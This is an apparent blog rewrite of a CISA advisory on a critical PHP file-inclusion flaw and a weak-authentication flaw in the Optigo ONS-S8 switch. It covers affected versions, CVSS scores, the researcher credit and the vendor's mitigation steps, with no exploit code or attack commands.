CISA Advisory: Critical Vulnerabilities in Optigo Networks ONS-S8 Switch

In an increasingly connected world, vulnerabilities in critical infrastructure can lead to catastrophic consequences. A recently released advisory from the Cybersecurity and Infrastructure Security Agency (CISA) has outlined significant vulnerabilities affecting the Optigo Networks ONS-S8 Spectra Aggregation Switch, which is critical for managing operational technology (OT) networks. Let's dig into the details of this advisory and explore its implications for security-conscious organizations.

1. Executive Summary​

The CISA advisory, designated as ICSA-24-275-01, highlights two major vulnerabilities within the equipment that are particularly alarming:

• CVSS v4 Score: 9.3 (Critical)
• Exploitable Remotely with Low Attack Complexity
• Vendor: Optigo Networks
• Equipment: ONS-S8 - Spectra Aggregation Switch
• Vulnerabilities Identified:
  • Improper Control of Filename for Include/Require Statement in PHP (CWE-98)
  • Weak Authentication (CWE-1390)

These findings emphasize the urgency of addressing the vulnerabilities to prevent potential exploitation.

2. Risk Evaluation​

The advisory clearly states that successful exploitation of these vulnerabilities could allow an attacker to:

• Achieve remote code execution
• Perform arbitrary file uploads
• Bypass authentication protocols

With such exploits potentially putting sensitive OT networks at severe risk, organizations utilizing the ONS-S8 must act quickly to reinforce their defenses.

3. Technical Details​

3.1 Affected Products​

Only versions of the ONS-S8 - Spectra Aggregation Switch 1.3.7 and earlier are affected, giving network administrators a clear target for necessary updates.

3.2 Vulnerability Overview​

3.2.1 PHP Remote File Inclusion (CWE-98)​

This vulnerability stems from inadequate validation of user input that allows attackers to execute arbitrary code remotely. Specifically, by exploiting the web service of the ONS-S8, an attacker can:

• Traverse directories inappropriately
• Bypass authentication
• Execute malicious code
• Associated CVE: CVE-2024-41925
• CVSS v3 Base Score: 9.8
• CVSS v4 Score: 9.3

3.2.2 Weak Authentication (CWE-1390)​

The second vulnerability presents an incomplete authentication process that could allow unauthorized access without the need for a password.

• Associated CVE: CVE-2024-45367
• CVSS v3 Base Score: 9.1
• CVSS v4 Score: 9.3

3.3 Background​

This advisory emphasizes the critical nature of the device, deployed across various sectors critical to manufacturing and other vital industries. The vulnerabilities potentially impact organizational operations on a global scale.

3.4 Researcher​

These vulnerabilities were identified by the Claroty Team82, a notable player in industrial cybersecurity.

4. Mitigations​

To curb these vulnerabilities, Optigo Networks and CISA recommend several proactive measures which include:

1. Unique Management VLAN: Always utilize a distinct management VLAN for ports connecting to OneView.
2. Network Segmentation: Implement a dedicated Network Interface Card (NIC) exclusively for the BMS computer managing OT configurations.
3. Whitelisting with Firewalls: Establish a router firewall permitting only specific devices to access OneView.
4. Secure VPN Connections: Use secure VPN connections to manage access to OneView.

CISA also advises that organizations engage in risk assessments and prepare for potential threats with a comprehensive defense strategy, including adherence to existing best practices in cybersecurity.

5. Update History​

• October 1, 2024: Initial publication of the advisory.

Conclusion​

For organizations relying on the Optigo Networks ONS-S8 Spectra Aggregation Switch, it's critical to evaluate existing configurations and implement the recommended mitigations immediately. Given the high CVSS scores associated with these vulnerabilities, taking decisive action will not only protect sensitive data but also maintain the integrity of overall operations.
No public exploitation targeting these vulnerabilities has been reported to CISA thus far, but this advisory serves as a timely warning for vigilance and preparedness in the ever-evolving landscape of cybersecurity threats.
Stay alert, keep your systems updated, and remember: in the world of IT security, prevention is always better than cure!
For further information and resources, check out CISA's dedicated cybersecurity practices for industrial control systems.
Source: CISA Optigo Networks ONS-S8 Spectra Aggregation Switch